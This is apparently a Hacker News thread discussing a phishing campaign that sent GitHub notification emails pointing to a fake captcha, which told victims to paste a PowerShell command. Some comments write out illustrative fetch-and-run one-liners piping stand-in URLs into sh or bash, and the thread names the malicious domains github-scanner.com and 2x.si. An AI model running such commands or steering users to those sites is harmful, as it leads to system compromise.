johnklos 3 hours ago | next |

Can be summarized with: Don't click on links in email.

So is github-scanner.com (and github-scanner.shop) still the same malicious party? It seems to be. Funny that their DNS is hosted by Cloudflare (who, famously, don't host anything, because they think we're all dumb). Cloudflare, who take responsibility for nothing, has no way to report this kind of abuse to them.

The domain which hosts the malware, 2x.si, both uses Cloudflare for DNS and is hosted by Cloudflare. At least it's possible to report this to Cloudflare, even though they rate limit humans and have CAPTCHAs on their abuse reporting forms.

Sigh. Thanks to Cloudflare, it's trivial these days to host phishing and malware.

poincaredisk 2 hours ago | root | parent | next |

Cloudflare is way more responsive to abuse requests than 95% of country level DNS registrars. Having experience working with both.

elashri 3 hours ago | root | parent | prev | next |

I don't know how effective and quick to respond but there is a way to report malware [1]

Extracting from the page

> Which category of abuse to select > Phishing & Malware

https://www.cloudflare.com/trust-hub/reporting-abuse/

johnklos 2 hours ago | root | parent |

Cloudflare's abuse form will not let you submit the report if you don't include a URL that currently points to their network. There're no options for phishing / scam domains for which they're the registrar and/or DNS hosting.

ToValueFunfetti an hour ago | root | parent |

I haven't tested the form, but they do claim you can report abuse of the registrar with some of the options, perhaps they've changed it?

Failing that:

> If Cloudflare is listed as the registrar on an ICANN WHOIS listing, you also can email reports related to our registrar services to registrar-abuse@cloudflare.com

spoonfeeder006 2 hours ago | root | parent | prev | next |

So how do you not click links to confirm your email for a new account?

Rather one could use Qubes OS and only open links in disposable VMs and never enter info beyond that

Thats basically what I do when I get emails to confirm my email address for a new account

One can't always avoid clicking links can they?

bentcorner an hour ago | root | parent |

> So how do you not click links to confirm your email for a new account?

Fair question, but the "don't click links in email" is for emails that you don't expect. And sure, that's an unsatisfying answer because it's hard to communicate this wisdom to your grandmother.

I think the best answer is defense-in-depth. Ensure you use updated email clients, browsers, and OS, and employ a dns blocker like a pihole or equivalent public service.

For less-savvy people a device like an iPad or Chromebook can be a reasonable defense.

keyle 4 hours ago | prev | next | 

      Press Win+R, CTRL+V <enter>
From captcha to gotcha.

I could see junior developers falling for this. Hey it's Github, it's legit right? We get security notifications every second months about some lib everyone uses etc.

      "Oh look, captcha by running code, how neat!"
I don't think webpages should be able to fill your copy/paste buffer from a click without a content preview. They made it requiring a user action, such as clicking, thinking that would solve the problem but it's still too weak. That's problem number 1.

People need to stop actioning any links from emails and/or believing that any content in an email has legitimacy. It doesn't. That's problem number 2.

Problem number 3, Windows still let you root a machine by 1 line in powershell? What the @$$%&%&#$?

Github might need to stop people putting links in issues without being checked by automated services that can validate the content as remotely legitimate. They're sending this stuff to people's email, don't tell me they're not aware this could be used for fishing! That's cyber security 101, in 2015.

Finally, Github, in being unable to act on the above, may need to better strip what they email to people, and essentially behave more like banks "you have a new issue in this repository..." and that's that. You then go there, there is no message, ok great. That would have taken care of this issue...

It seems Github needs to graduate a bit here.

gerdesj 3 hours ago | root | parent | next |

"I could see junior developers falling for this" - I can see all sorts fucking up, not just juniors. It is the way of things.

"I don't think that...". I think that you have to train your troops effectively in what is harmfull.

"Windows" - yes. I have been asked by at least two of my employees to get them away from Windows. I'll do my best. Its been a long running project but I will succeed.

ocdtrekkie 4 hours ago | root | parent | prev | next |

I've started disabling the Run dialog for non-technical users, but unfortunately a GitHub attack targets users who likely have a real use for it sometimes.

The clipboard strategy feels like it should be easy to block too, most scammers just convince people to type a well-obscured URL into the Run dialog manually over the phone.

justsomehnguy 4 hours ago | root | parent | prev | next |

> Problem number 3, Windows still let you root a machine by 1 line in powershell? What the @$$%&%&#$?

sigh It needs to be run under an account with admin privileges for that. The shield on the "Run" dialog screenshot clearly indicates what it was taken under a user with admin privileges and UAC disabled.

Come on, now cry what Linux still let you root a machine by 1 line in curl malware.zyx/evilscript | bash.

koolba 3 hours ago | root | parent | next |

> … by 1 like in curl malware.zyx/evilscript | bash.

Making the script POSIX compliant would allow hacking computers without bash. Then you can pipe it into just “sh” which is guaranteed to be on the PATH.

rl3 3 hours ago | root | parent | prev |

>Come on, now cry what Linux still let you root a machine by 1 line in curl malware.zyx/evilscript | bash.

Excuse me, but some of us prefer to let evil scripts root our machines via pure sh, thank you very much.

Dalewyn 3 hours ago | root | parent | prev |

>Windows still let you root a machine by 1 line in powershell? What the @$$%&%&#$?

You say it's a problem, I say it is a virtue.

We can "root" Windows because we are root, specifically a user in the Administrators group because the first user account configured by Windows Setup is always an administrator account.

This is a virtue. We can do whatever we want with the computer we own and use. This is freedom par excellence that literally every other operating system family today wishes they could do without getting shouted down.

In an era of increasingly locked down operating systems that prevent us from truly owning our computers, administering them, Windows just lets us do that. I hope to god this never changes.

AdieuToLogic 2 hours ago | root | parent | next |

>>Windows still let you root a machine by 1 line in powershell? What the @$$%&%&#$?

> We can do whatever we want with the computer we own and use.

There is a difference between what an owner of a computer can and should be able to do, verses what an arbitrary actor can do to a computer they do not own through subterfuge. It is the responsibility of an Operating System to facilitate the former and guard against the latter.

MS Windows has a poor history of being able to do either.

Dalewyn 2 hours ago | root | parent |

Remember the old saying: With great power comes great responsibility.

Windows just lets us do anything and everything, and it's up to us how we want to secure it if at all.

Every other operating system family tries to realize security by straight up locking the user, the administrator, out of his own computer. They still get compromised, by the way.

Windows has absolutely succeeded and continues to succeed in enabling the user, including security if he so desires. This is the reason Windows became the dominant desktop OS. The others? Nope on both counts. The Linux world in particular always screams about user freedom, yet ironically it's Windows and its community that actually makes that freedom a reality.

Once more: I hope to god this never changes.

nativeit an hour ago | root | parent | next |

This is a wild take. Would you mind expanding a bit on the oppressive, locked down ecosystem that’s choking the free expression of Linux users?

Dalewyn an hour ago | root | parent |

For starters it's security theater, given everyone and their dog prefixes sudo to all commands without much thinking. There are also some who just smash in sudo -i as the first thing they ever do upon boot (guilty as charged) because they suffer RSI from typing sudo a trillion times.

There's also this impression that the operating system is just secure and you as the user are just protected like it's a law of physics. Spoiler alert, you are not and it's not a law of physics either. It's still your responsibility to secure the computer if you so desire and otherwise not do dumb shit like copypasta'ing commands from the internet.

I'm not even going to get into the politics that are package managers and repos, that's just straight bullshit that has more to do with human nature than computer science.

Speaking of politics, most of the FOSS community at large hates users using and administrators administering computers how they want. You must subscribe to the One Libre Way(tm) or you are a heathen doing it wrong. So much for freedom. The Windows community meanwhile is mostly composed of jaded engineers who are just happy to see others get stuff done and get through another day in one piece.

Windows from the start places the user at the controls with mostly no child safety locks in place (and you can remove what is there easily, eg: UAC), and with that power you have to accept that if you end up hosing the system the problem is you because Windows doesn't even pretend to really protect you.

Having the sheer power to hose Windows with a single Powershell line is what freedom is. Freedom is both delightful and horrifying.

darby_nine 3 hours ago | root | parent | prev |

> This is a virtue. We can do whatever we want with the computer we own and use.

You certainly don't need to do it with a single line of powershell though. At least, not without intentionally opting into it. For the most part on a daily basis I just want to use my computer, not modify it.

Anyway, at the very least most functionality should be sandboxed so that if someone does something without your consent, it can't do much damage. Though this wasn't the original intention, leveraging user privileges and sandboxing applications by user is an effective way to do this.

Besides what kind of moron would choose proprietary software if they wanted control of their machine? It's inherently a contradictory impulse.

theamk 5 hours ago | prev | next |

Do people really fall for scam like that?

First, I assume the author knows the email came from github, as the screenshot does not show this very clearly. If that's the case:

Red flag #1: email links to a variation of real domain. If you don't have information on who github-scanner.com is, it is pretty safe to assume it's a scam , just because it sounds like a real website.

GIANT Enormous Huge Red Flag #2: captcha asks you to types command in shell. I have no comment on how naive one must be to do this.

thephyber 5 hours ago | root | parent | next |

It’s a numbers game.

Nobody is perfect. The more features of credibility, most likely there will be a higher percentage of conversions. But not everybody has excellent vision, is not time-pressured, and is not tired/exhausted.

There are lots of conditions that make otherwise difficult fraud targets more easy to trick.

And if it can be done at large scale / automated, then small conversion rates turn into many successful frauds (compromised accounts).

latexr 3 hours ago | root | parent | prev | next |

A few weeks ago someone opened an issue in one of my repos. In under a minute two accounts replied with links to file lockers asking the user to download and try some software to solve their issue. No doubt it was malware. I promptly deleted the comments and reported the accounts to GitHub.

I wouldn’t have fallen for such an obvious ploy, but the original asker seemed like they weren’t particularly technical, judging by the sparse GitHub history and quality of the question. I could see them perhaps falling for that if they were uncritical and too eager to try anything.

ceejayoz 5 hours ago | root | parent | prev | next |

Email from a different domain is unfortunately quite common. Citi and PayPal both do it for some emails. Pisses me off every time.

mewpmewp2 5 hours ago | root | parent | prev | next |

I can understand clicking on the link while not paying attention, but I do wonder how many people who are signed up on GitHub would follow through with pasting this command. I could understand if elderly non technical people might follow up with it, but this one, I wonder what the rate is.

lgats 4 hours ago | root | parent | prev | next |

re #1: the email could link to a github pages site hosting the same malware...

re #2: it doesn't really have you typing into shell, 'just paste'

fijiaarone 4 hours ago | root | parent | prev | next |

Everyone has been trained for years to do this:

curl http://obscure.url?random-string | sh

umanwizard 3 hours ago | root | parent | prev | next |

No they haven’t, they’ve been trained to do

    curl https://url-of-well-known-project | sh
I may not trust the owners of a random domain, but I certainly trust the owners of rustup.rs not to do anything intentionally malicious.

kurisufag 4 hours ago | root | parent | prev | next |

people make a lot of noise about piping into shell, but even if the instructions were

wget random.club/rc-12-release.sh

chmod +x ./rc-12-release.sh

./rc-12-release.sh

almost nobody would actually read the script before running it

mixtureoftakes 4 hours ago | root | parent | prev |

Honestly i would have typed commands in shell if "captcha" asked me for it. Just to see the scale of outcome's awfulness.

I'm almost bored enough to just start installing weird malware for research and funsies

elashri 6 hours ago | prev | next |

> The attacker quickly deletes the issue

I realized I have never deleted an issue I started but doesn't people with admin access the only with ability to delete the issues on a repo? [1]. So actually there is a trace for that issue in the repository. Same thing for Pull requests.

[1] https://docs.github.com/en/issues/tracking-your-work-with-is...

8organicbits 6 hours ago | root | parent | next |

Maybe GitHub had already deleted it as malicious, but the email was already delivered.

tonygiorgio 5 hours ago | root | parent |

I got this on two org repo’s yesterday. About an hour after the email, I checked and it was gone. I wanted to report it, even though GitHub scam reports are so very unsatisfying (weeks go by, then random email about how they took some action).

One very simple measure I hope they implement is just not sending emails for unverified spam like this. I’d argue a majority of issues or comments do not need instant emails. Even one hour delay could help in combating abuse like this if they had any sort of reasonable moderation rules.

latexr 3 hours ago | root | parent |

> GitHub scam reports are so very unsatisfying (weeks go by, then random email about how they took some action).

Either you’re unlucky or I’m lucky, I’ve reported scammers to GitHub multiple times and always got a response in a couple of hours.

elashri 3 hours ago | root | parent |

I reported spam comment and they acted in less than an hour. I reported the exact spam comment by another user in the same day and they took 3 months to act. It is a very random process.

dabbz 19 minutes ago | prev | next |

I've also been seeing Typeform emails coming from spam sources. Somehow people are using Typeform's positive reputation score to send emails to arbitrary emails.

xwall 3 hours ago | prev | next |

OMG! I was getting similar GitHub notification emails, saying detected vulnerability in your repo, but never figured it out as fake before this news, anyway I never clicked because I'm a lazy programmer :), once it's written it's written I do rewrite the code but don't find bugs and fix in my code. :D

qwertox 6 hours ago | prev | next |

It's worth the read, he shows what they're trying to do.

Easy to be suspicious with the link alone, but its fun to see someone digging into it.

cebu_blue 5 hours ago | prev | next |

I don't understand whats special about this particular attack!>:( When I read the title I thought some automated GitHub emails were forged to sneakily point to a fake GitHub site or something. An obvious (for tech-savvy users) link pointing to an obvious malware (please copy and execute this code to solve the captcha.) If the people you are targeting fall for this why not send an old fashioned spam email with fake headers or via some hacked Wordpress installation? I guess using GitHub notifications is creative but in the end not much different than like sending a facebook message with a fake link, and the user getting an email notification with the message? The analysis of the malware once downloaded was certainly interesting, though!:)

latexr 3 hours ago | prev | next |

> In text form (link altered for your safety)

Might want to change the image too, macOS recognises the link in that and makes it clickable. I’d say that’s more dangerous than modifying it in the text of the post, you could just as well include a non-clickable text link.

crvdgc 4 hours ago | prev | next |

Months ago I got crypto ads through a similar approach, some fake new account @-ing hundreds of users in an issue and then the issue is removed. The net effect is that the ads become unblockable in your email box (It's from GitHub!).

Maybe devs' target value in general has growing to a point where the openness of the system is more of a vulnerability than service.

slig 6 hours ago | prev | next |

Seriously how hard it can be for GH to detect that a randomly just created account is creating issues, with the same text, containing a link inside?

I got dozens of such spam during a whole day.

nine_k 5 hours ago | root | parent |

Once they introduce that, the texts will become more varied, and links, possibly, too.

There are more possible next steps, which would make creating accounts for spamming more expensive, but they will also inconvenience well-meaning new users.

I suspect that unless the problem of malicious spam from GitHub comments becomes rather serious, acting on the case by case basis may be the correct solution.

fforflo 3 hours ago | prev | next |

While we're here: what happened to the GitHub explore newsletter? I really enjoyed this, but I've stopped receiving it for a few months now. And I don't think I unsubscribed.

rwestergren 3 hours ago | prev | next |

One one hand, I can see the captcha is easy to fall for. On the other, nothing says "prove you aren't a machine" like "run this code that a machine could easily run."

drexlspivey 5 hours ago | prev | next |

If your method of infecting your victim is having them paste and run a random command on their terminal, software developers is probably the worst group of people to be targeting.

thephyber 5 hours ago | root | parent | next |

“Curl pipe sh” would like to have a word…

I think you are painting with a broad brush.

vultour 4 hours ago | root | parent |

This is no different from installing a random package through a package manager. If you're running "curl pipe sh" because an email told you to, that's on you.

craftkiller 3 hours ago | root | parent |

No it isn't. Package managers verify the cryptographically signed package. That means the package can be built on a secure server, and then if a mirror becomes malicious or gets compromised, the malicious package won't have a valid signature so the package will not be installed. Running curl and piping it into sh means that not only could a malicious mirror or compromised server execute anything they want on your computer, but they could even send a different script when you curl it into sh vs when you view it any other way, making it much harder to detect[0].

[0] https://web.archive.org/web/20240213030202/https://www.idont...

_hyn3 24 minutes ago | root | parent | next |

The tremendous number of attacks delivered via trusted package repos versus the number of widespread attacks via curl | sh (probably roughly zero) means that, theories aside, one of these is far more commonly abused than the other.

dylan604 3 hours ago | root | parent | prev |

I think the npm repos would like to have a word with you. Sure glad we've never had a cryptographically signed malicious package delivered via npm install

craftkiller 2 hours ago | root | parent |

Thats like not wearing a seatbelt because you can still be crushed by a truck. Don't let perfect be the enemy of good. Package managers prevent some attacks that are possible via curl | sh. Some other attacks are still possible. It is still better than not cryptographically verifying the package.

dylan604 19 minutes ago | root | parent |

That's like moving the goal posts so you can still try to have a point after the fact. Your comment suggested that package manager was secure while curl | sh isn't because the package manager won't have a valid signature. That's only if the package manager was compromised. A code package that is built to be malicious will still get signed by your manager. Only now, people think they are secure because it was signed.

lukan 4 hours ago | root | parent | prev | next |

My only encounter with this is, that I am annoyed if I open web dev tools on a new browser profile/guest profile, but am interrupted in my workflow because first I have to type "allow pasting" every single time. (Why I do this quite often? To be sure to have a clean state when debugging a web app) And all this, because some people cannot think, before they follow obscure instructions send to them by a untrusted party?

Why can't we have nice things again? Because of abusers yes, but also because of sheep people.

TheRealPomax 4 hours ago | root | parent | prev |

You just need a handful of people to fall for it, and a population of a hundred million daily active users on GitHub means there are always a handful of people to trick.

joshdavham 4 hours ago | prev | next |

These hackers need to work on the rest of their funnel lmao. Getting me to click the link would be easy, but running that script? Never in a million years!

fijiaarone 4 hours ago | prev | next |

This is neither hijacking notifications nor sending malware. This is someone including a link in a message on a ticketing system open to the public, and then someone clicking on the link and downloading malware.

avazhi 3 hours ago | prev | next |

If you're stupid enough to paste something off a random website (that you discovered through a random email link) into the command line (and then execute it), then you deserve what happens next. At some point the end user is to blame.

I also have no clue why any reasonable person would refer to that monstrosity as a CAPTCHA.